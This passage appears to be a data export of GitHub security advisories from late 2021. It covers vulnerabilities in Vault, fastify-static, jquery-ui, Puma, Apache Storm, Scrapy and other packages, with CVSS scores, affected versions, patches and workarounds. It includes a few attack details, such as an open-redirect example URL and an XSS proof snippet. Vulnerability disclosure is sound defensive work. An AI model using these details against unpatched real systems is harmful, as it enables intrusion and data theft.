between glob-related policies and the Google Cloud secrets engine. Users may, in some situations, have more privileges than intended, e.g., a user with read permission for the /gcp/roleset/* path may be able to issue Google Cloud service account credentials.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'last_affected': '1.8.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42135'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-28-vaults-google-cloud-secrets-engine-policies-with-globs-may-provide-additional-privileges-in-vault-1-8-0-onwards/'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/main/CHANGELOG.md#180'}]","{'cwe_ids': ['CWE-266', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T16:53:55Z', 'nvd_published_at': '2021-10-11T03:15:00Z'}" +1.4.0,GHSA-ggmv-6q9p-9gm6,2021-10-19T14:51:11Z,2021-10-12T17:51:04Z,,['CVE-2021-42134'],Cross-site Scripting in django-unicorn,The Unicorn framework before 0.36.1 for Django allows XSS via a component. NOTE: this issue exists because of an incomplete fix for CVE-2021-42053.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-unicorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.36.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42134'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/commit/3a832a9e3f6455ddd3b87f646247269918ad10c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/adamghill/django-unicorn'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/compare/0.36.0...0.36.1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T16:56:03Z', 'nvd_published_at': '2021-10-11T01:15:00Z'}" +1.4.0,GHSA-h58v-g3q6-q9fx,2021-10-21T21:33:34Z,2021-10-22T16:20:53Z,,['CVE-2021-41169'],Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in sulu/sulu,"### Impact + +_What kind of vulnerability is it? Who is impacted?_ + +It is an issue when input HTML into the Tag name. The HTML is execute when the tag name is listed in the auto complete form. +Only admin users are affected and only admin users can create tags. + +### Patches + +_Has the problem been patched? What versions should users upgrade to?_ + +The problem is patched with Version 1.6.42. + +### Workarounds + +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +Create a custom request listener to avoid that this kind of tags are created. + +### References + +_Are there any links users can visit to find out more?_ + +Currently not. + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [sulu/sulu repository](https://github.com/sulu/sulu/issues) +* Email us at [security@sulu.io](mailto:security@sulu.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.43'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-h58v-g3q6-q9fx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41169'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/20007ac70a3af3c9e53a6acb0ef8794b65642445'}, {'type': 'PACKAGE', 'url': 'https://github.com/sulu/sulu'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T21:33:34Z', 'nvd_published_at': '2021-10-21T21:15:00Z'}" +1.4.0,GHSA-p6vg-p826-qp3v,2021-10-21T15:01:19Z,2021-10-05T20:24:49Z,,['CVE-2021-22963'],URL Redirection to Untrusted Site ('Open Redirect') in fastify-static,"### Impact + +A redirect vulnerability in the `fastify-static` module allows remote attackers to redirect Mozilla Firefox users to arbitrary websites via a double slash `//` followed by a domain: `http://localhost:3000//google.com/%2e%2e`. + +The issue shows up on all the `fastify-static` applications that set `redirect: true` option. By default, it is `false`. + +### Patches +The issue has been patched in `fastify-static@4.2.4` + +### Workarounds +If updating is not an option, you can sanitize the input URLs using the [`rewriteUrl`](https://www.fastify.io/docs/latest/Server/#rewriteurl) server option. + +### References + ++ Bug founder: drstrnegth ++ [hackerone Report](https://hackerone.com/reports/1354255) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [fastify-static](https://github.com/fastify/fastify-static) +* Contact the [security team](https://github.com/fastify/fastify/blob/main/SECURITY.md#the-fastify-security-team) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-static/security/advisories/GHSA-p6vg-p826-qp3v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22963'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1354255'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastify/fastify-static'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:55:33Z', 'nvd_published_at': '2021-10-14T15:15:00Z'}" +1.4.0,GHSA-4p3x-8qw9-24w9,2021-10-26T17:56:23Z,2021-10-27T18:53:18Z,,['CVE-2021-41188'],Authenticated Stored XSS in shopware/shopware,"### Impact +Authenticated Stored XSS in Administration + +### Patches +Use the Security Plugin: +https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html + +### Workarounds +If you cannot use the security plugin, add the following config to your `.htaccess` file + +``` + + + Header set Content-Security-Policy ""script-src 'none'"" + + +``` + +If you are using nginx as server config, you can add the following to your configuration: +``` +server { + # ... + + location ~* ^.+\.svg$ { + add_header Content-Security-Policy ""script-src 'none'""; + } +} +``` + +### References +https://docs.shopware.com/en/shopware-5-en/sicherheitsupdates/security-update-10-2021 + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-4p3x-8qw9-24w9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41188'}, {'type': 'WEB', 'url': 'https://github.com/shopware/shopware/commit/37213e91d525c95df262712cba80d1497e395a58'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/sicherheitsupdates/security-update-10-2021'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/shopware'}, {'type': 'WEB', 'url': 'https://github.com/shopware/shopware/releases/tag/v5.7.6'}, {'type': 'WEB', 'url': 'https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:56:23Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}" +1.4.0,GHSA-6768-mcjc-8223,2022-10-19T15:36:14Z,2021-10-27T18:51:22Z,,['CVE-2021-38294'],Command injection leading to Remote Code Execution in Apache Storm,A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38294'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/storm'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5fe881f6ca883908b7a0f005d35115af49f43beea7a8b0915e377859%40%3Cuser.storm.apache.org%3E'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2021/q4/44'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165019/Apache-Storm-Nimbus-2.2.0-Command-Execution.html'}]","{'cwe_ids': ['CWE-74', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:52:52Z', 'nvd_published_at': '2021-10-25T13:15:00Z'}" +1.4.0,GHSA-48w2-rm65-62xx,2022-08-16T19:48:45Z,2021-10-12T17:53:00Z,,['CVE-2021-41136'],Puma with proxy which forwards LF characters as line endings could allow HTTP request smuggling,"### Impact + +Prior to `puma` version 5.5.0, using `puma` with a proxy which forwards LF characters as line endings could allow HTTP request smuggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. + +This behavior (forwarding LF characters as line endings) is very uncommon amongst proxy servers, so we have graded the impact here as ""low"". Puma is only aware of a single proxy server which has this behavior. + +If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. + +### Patches + +This vulnerability was patched in Puma 5.5.1 and 4.3.9. + +### Workarounds + +This vulnerability only affects Puma installations without any proxy in front. + +Use a proxy which does not forward LF characters as line endings. + +Proxies which do not forward LF characters as line endings: + +* Nginx +* Apache (>2.4.25) +* Haproxy +* Caddy +* Traefik + +### Possible Breakage + +If you are [dealing with legacy clients that want to send `LF` as a line ending](https://stackoverflow.com/questions/43574428/have-apache-accept-lf-vs-crlf-in-request-headers) in an HTTP header, this will cause those clients to receive a `400` error. + +### References + +* [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling) + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [Puma](https://github.com/puma/puma) +* See our [security policy](https://github.com/puma/puma/security/policy) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-48w2-rm65-62xx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41136'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/acdc3ae571dfae0e045cf09a295280127db65c7f'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/releases/tag/v4.3.9'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/releases/tag/v5.5.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2021-41136.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/08/msg00015.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-28'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5146'}]","{'cwe_ids': ['CWE-444'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T17:06:36Z', 'nvd_published_at': '2021-10-12T16:15:00Z'}" +1.4.0,GHSA-jcxv-2j3h-mg59,2021-11-18T15:31:01Z,2021-10-12T22:03:09Z,,['CVE-2017-17760'],Improper Restriction of Operations within the Bounds of a Memory Buffer in OpenCV,"OpenCV 3.3.1 (corresponding with opencv-python and opencv-contrib-python 3.3.1.11) has a Buffer Overflow in the cv::PxMDecoder::readData function in grfmt_pxm.cpp, because an incorrect size value is used.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-17760'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10351'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10369/commits/7bbe1a53cfc097b82b1589f7915a2120de39274c'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/102974'}]","{'cwe_ids': ['CWE-119'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:20:01Z', 'nvd_published_at': '2017-12-29T18:29:00Z'}" +1.4.0,GHSA-25fx-mxc2-76g7,2022-08-15T20:11:12Z,2021-10-06T17:49:11Z,,['CVE-2021-41120'],"Sylius PayPal Plugin allows unauthorized access to Credit card form, exposing payer name and not requiring 3DS","### Impact +URL to the payment page done after checkout was created with autoincremented payment id (`/pay-with-paypal/{id}`) and therefore it was easy to access for anyone, not even the order's customer. The problem was, the Credit card form has prefilled ""credit card holder"" field with the Customer's first and last name. +Additionally, the mentioned form did not require a 3D Secure authentication, as well as did not checked the result of the 3D Secure authentication. + +### Patches +The problem has been patched in Sylius/PayPalPlugin **1.2.4** and **1.3.1** + +### Workarounds +One can override a `sylius_paypal_plugin_pay_with_paypal_form` route and change its URL parameters to (for example) `{orderToken}/{paymentId}`, then override the `Sylius\PayPalPlugin\Controller\PayWithPayPalFormAction` service, to operate on the payment taken from the repository by these 2 values. It would also require usage of custom repository method. +Additionally, one could override the `@SyliusPayPalPlugin/payWithPaypal.html.twig` template, to add `contingencies: ['SCA_ALWAYS']` line in `hostedFields.submit(...)` function call (line 421). It would then have to be handled in the function callback. + +### For more information +If you have any questions or comments about this advisory: +- Open an issue in Sylius/PayPalPlugin issues +- Email us at security at sylius dot com +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/paypal-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/paypal-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sylius/PayPalPlugin/security/advisories/GHSA-25fx-mxc2-76g7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41120'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/PayPalPlugin/commit/2adc46be2764ccee22b4247139b8056fb8d1afff'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/PayPalPlugin/commit/814923c2e9d97fe6279dcee866c34ced3d2fb7a7'}, {'type': 'PACKAGE', 'url': 'https://github.com/Sylius/PayPalPlugin'}]","{'cwe_ids': ['CWE-200', 'CWE-639'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T21:12:27Z', 'nvd_published_at': '2021-10-05T21:15:00Z'}" +1.4.0,GHSA-jwqp-28gf-p498,2021-10-06T17:32:00Z,2021-10-06T17:46:22Z,,['CVE-2021-41125'],HTTP authentication credentials potentially leaked to target websites ,"### Impact + +If you use [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth) (i.e. the `http_user` and `http_pass` spider attributes) for HTTP authentication, all requests will expose your credentials to the request target. + +This includes requests generated by Scrapy components, such as `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`, or as requests reached through redirects. + +### Patches + +Upgrade to Scrapy 2.5.1 and use the new `http_auth_domain` spider attribute to control which domains are allowed to receive the configured HTTP authentication credentials. + +If you are using Scrapy 1.8 or a lower version, and upgrading to Scrapy 2.5.1 is not an option, you may upgrade to Scrapy 1.8.1 instead. + +### Workarounds + +If you cannot upgrade, set your HTTP authentication credentials on a per-request basis, using for example the [`w3lib.http.basic_auth_header`](https://w3lib.readthedocs.io/en/latest/w3lib.html#w3lib.http.basic_auth_header) function to convert your credentials into a value that you can assign to the `Authorization` header of your request, instead of defining your credentials globally using [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth). + +### For more information +If you have any questions or comments about this advisory: +* [Open an issue](https://github.com/scrapy/scrapy/issues) +* [Email us](mailto:opensource@zyte.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Scrapy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Scrapy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/scrapy/scrapy/security/advisories/GHSA-jwqp-28gf-p498'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41125'}, {'type': 'WEB', 'url': 'https://github.com/scrapy/scrapy/commit/b01d69a1bf48060daec8f751368622352d8b85a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/scrapy/scrapy'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/03/msg00021.html'}, {'type': 'WEB', 'url': 'https://w3lib.readthedocs.io/en/latest/w3lib.html#w3lib.http.basic_auth_header'}, {'type': 'WEB', 'url': 'http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth'}]","{'cwe_ids': ['CWE-200', 'CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:32:00Z', 'nvd_published_at': '2021-10-06T18:15:00Z'}" +1.4.0,GHSA-q6j2-g8qf-wvf7,2022-06-29T21:54:06Z,2021-10-12T22:34:28Z,,['CVE-2020-19003'],Verification check bypass in Gate One,An issue in Gate One 1.2.0 allows attackers to bypass to the verification check done by the origins list and connect to Gate One instances used by hosts not on the origins list.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'gateone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19003'}, {'type': 'WEB', 'url': 'https://github.com/liftoff/GateOne/issues/728'}, {'type': 'PACKAGE', 'url': 'https://github.com/liftoff/GateOne'}]","{'cwe_ids': ['CWE-290'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T13:57:49Z', 'nvd_published_at': '2021-10-06T13:15:00Z'}" +1.4.0,GHSA-q854-j362-cfq9,2021-10-08T21:54:35Z,2021-10-12T16:22:30Z,,['CVE-2020-23849'],Cross-site Scripting in jsoneditor,Stored XSS was discovered in the tree mode of jsoneditor before 9.0.2 through injecting and executing JavaScript.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsoneditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23849'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/jsoneditor/issues/1029'}, {'type': 'PACKAGE', 'url': 'https://github.com/josdejong/jsoneditor'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:54:35Z', 'nvd_published_at': '2021-01-11T14:15:00Z'}" +1.4.0,GHSA-rqgp-ccph-5w65,2021-11-02T18:42:29Z,2021-10-28T23:14:14Z,,['CVE-2021-3901'],Cross-Site Request Forgery in firefly-iii,firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3901'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/b42d8d1e305cad70d9b83b33cd8e0d7a4b2060c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/62508fdc-c26b-4312-bf75-fd3a3f997464'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T21:12:18Z', 'nvd_published_at': '2021-10-27T21:15:00Z'}" +1.4.0,GHSA-gpqq-952q-5327,2022-10-04T21:36:19Z,2021-10-26T14:55:12Z,,['CVE-2021-41184'],XSS in the `of` option of the `.position()` util in jquery-ui,"### Impact +Accepting the value of the `of` option of the [`.position()`](https://api.jqueryui.com/position/) util from untrusted sources may execute untrusted code. For example, invoking the following code: +```js +$( ""#element"" ).position( { + my: ""left top"", + at: ""right bottom"", + of: """", + collision: ""none"" +} ); +``` +will call the `doEvilThing()` function. + +### Patches +The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector. + +### Workarounds +A workaround is to not accept the value of the `of` option from untrusted sources. + +### For more information +If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery.UI.Combined'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-ui-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/security/advisories/GHSA-gpqq-952q-5327'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41184'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/commit/effa323f1505f2ce7a324e4f429fa9032c72f280'}, {'type': 'WEB', 'url': 'https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery-ui'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211118-0004/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-001'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T22:06:43Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}" +1.4.0,GHSA-7c7g-72q7-4xhm,2021-10-08T22:15:48Z,2021-10-12T16:27:35Z,,['CVE-2020-28274'],Prototype pollution vulnerability in 'deepref',Prototype pollution vulnerability in 'deepref' versions 1.1.1 through 1.2.1 allows attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'deepref'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.1'}, {'last_affected': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28274'}, {'type': 'PACKAGE', 'url': 'https://github.com/isaymatato/deepref'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28274,https://github.com/isaymatato/deepref/commit/24935e6a1060cb09c641d3075982f0b44cfca4c2'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:15:48Z', 'nvd_published_at': '2020-12-08T22:15:00Z'}" 